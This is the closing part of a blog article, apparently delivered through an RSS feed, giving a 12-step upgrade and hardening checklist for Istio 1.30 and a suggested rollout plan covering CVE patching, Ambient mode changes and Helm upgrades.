&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Step&lt;/th&gt;
&lt;th&gt;Target&lt;/th&gt;
&lt;th&gt;Command / action&lt;/th&gt;
&lt;th&gt;Expected outcome&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;istioctl pre-check&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;istioctl analyze --all-namespaces&lt;/code&gt; + check for IST0175&lt;/td&gt;
&lt;td&gt;Identify workloads missing &lt;code&gt;BLOCKED_CIDRS_IN_JWKS_URIS&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;JWKS / RequestAuthentication&lt;/td&gt;
&lt;td&gt;Audit &lt;code&gt;RequestAuthentication&lt;/code&gt; resources, especially external IdP &lt;code&gt;jwksUri&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Fallback paths covered by 1.30 patch&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;XDS debug tooling&lt;/td&gt;
&lt;td&gt;Search internal tooling for &lt;code&gt;istioctl proxy-status --plaintext&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Switch to authenticated/mTLS access&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;AuthorizationPolicy regex&lt;/td&gt;
&lt;td&gt;Search &lt;code&gt;source.principals&lt;/code&gt; / &lt;code&gt;source.namespaces&lt;/code&gt; for metacharacters&lt;/td&gt;
&lt;td&gt;Zero unintended wildcard matches&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;CNI permissions&lt;/td&gt;
&lt;td&gt;&lt;code&gt;stat /etc/cni/net.d/15-istio-cni.conf&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;0600; flip &lt;code&gt;CNI_CONF_GROUP_READ=true&lt;/code&gt; only if needed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;Ambient CIDR ServiceEntry&lt;/td&gt;
&lt;td&gt;Collapse legacy VM-pool &lt;code&gt;ServiceEntry&lt;/code&gt; resources to CIDR form&lt;/td&gt;
&lt;td&gt;ztunnel longest-prefix-match routing works&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;7&lt;/td&gt;
&lt;td&gt;Waypoint XFCC&lt;/td&gt;
&lt;td&gt;Annotate waypoint Gateway with &lt;code&gt;ambient.istio.io/xfcc-include-client-identity: "true"&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Upstream apps log SPIFFE-derived XFCC&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;8&lt;/td&gt;
&lt;td&gt;HBONE window sizes&lt;/td&gt;
&lt;td&gt;Tune &lt;code&gt;PILOT_HBONE_INITIAL_STREAM_WINDOW_SIZE&lt;/code&gt; on hot waypoints&lt;/td&gt;
&lt;td&gt;Compare throughput and p99 latency before / after&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;9&lt;/td&gt;
&lt;td&gt;OTel Semantic Conventions&lt;/td&gt;
&lt;td&gt;Enable &lt;code&gt;serviceAttributeEnrichment: OTEL_SEMANTIC_CONVENTIONS&lt;/code&gt;
&lt;/td&gt;
&lt;td&gt;Tempo/Jaeger spans show aligned &lt;code&gt;service.name&lt;/code&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;10&lt;/td&gt;
&lt;td&gt;AWS EKS Branch ENI&lt;/td&gt;
&lt;td&gt;Measure kubelet probe success on Ambient pods using Security Groups for Pods&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;AMBIENT_ENABLE_AWS_BRANCH_ENI_PROBE&lt;/code&gt; on by default; failed probes disappear&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;11&lt;/td&gt;
&lt;td&gt;Helm v4 upgrade&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;helm upgrade istio-base istio/base --version 1.30.0&lt;/code&gt; (SSA)&lt;/td&gt;
&lt;td&gt;Zero &lt;code&gt;failurePolicy&lt;/code&gt; ownership conflicts&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;12&lt;/td&gt;
&lt;td&gt;Rollback rehearsal&lt;/td&gt;
&lt;td&gt;Apply &lt;code&gt;compatibilityVersion=1.28&lt;/code&gt; to restore sidecar hostname-matching&lt;/td&gt;
&lt;td&gt;Legacy routing restored immediately; staged re-migration plan written&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  10. The new default the release sets
&lt;/h2&gt;

&lt;p&gt;Istio 1.30 is three releases in one: a &lt;strong&gt;security release&lt;/strong&gt;, a preview of a &lt;strong&gt;future data plane&lt;/strong&gt;, and a round of &lt;strong&gt;operational automation&lt;/strong&gt;. The four CVEs are &lt;em&gt;patch-now&lt;/em&gt; work. Agentgateway, the &lt;code&gt;TrafficExtension&lt;/code&gt; API, and Ambient's CIDR &lt;code&gt;ServiceEntry&lt;/code&gt; are &lt;em&gt;plan-the-rest-of-2026&lt;/em&gt; work. A reasonable rollout shape: (1) patch every supported track (1.28.7 / 1.29.3 / 1.30.0) within a week; (2) on 1.30, pin &lt;code&gt;compatibilityVersion=1.28&lt;/code&gt; for about a week so production keeps the old sidecar hostname matching while you regression-test the new behavior, then remove the pin; (3) on Ambient clusters, collapse the legacy &lt;code&gt;ServiceEntry&lt;/code&gt; inventory with CIDR &lt;code&gt;ServiceEntry&lt;/code&gt; and turn on XFCC synthesis where upstream apps need caller identity; (4) if the topology includes an isolated AI gateway, move one route at a time onto the &lt;code&gt;istio-agentgateway&lt;/code&gt; &lt;code&gt;GatewayClass&lt;/code&gt; to start collecting regression data. The service mesh is no longer just "microservice routing + mTLS": 1.30 makes it the control point for AI traffic, multi-network topology, OpenTelemetry alignment, and Zero-Trust debug channels at the same time.&lt;/p&gt;




&lt;p&gt;&lt;em&gt;This article was originally published in Korean at &lt;a href="https://www.manoit.co.kr/forum/view/1475485" rel="noopener noreferrer"&gt;manoit.co.kr&lt;/a&gt;. It was co-authored by ManoIT engineering and Anthropic Claude (Opus 4.6). Official sources used: Istio 1.30 release notes, change notes, upgrade notes, and the linked CVE advisories on the National Vulnerability Database.&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://www.manoit.co.kr/forum/view/1475485" rel="noopener noreferrer"&gt;ManoIT Tech Blog&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>kubernetes</category>
      <category>security</category>
      <category>observability</category>
      <category>servicemesh</category>
    </item>
  </channel>
</rss>
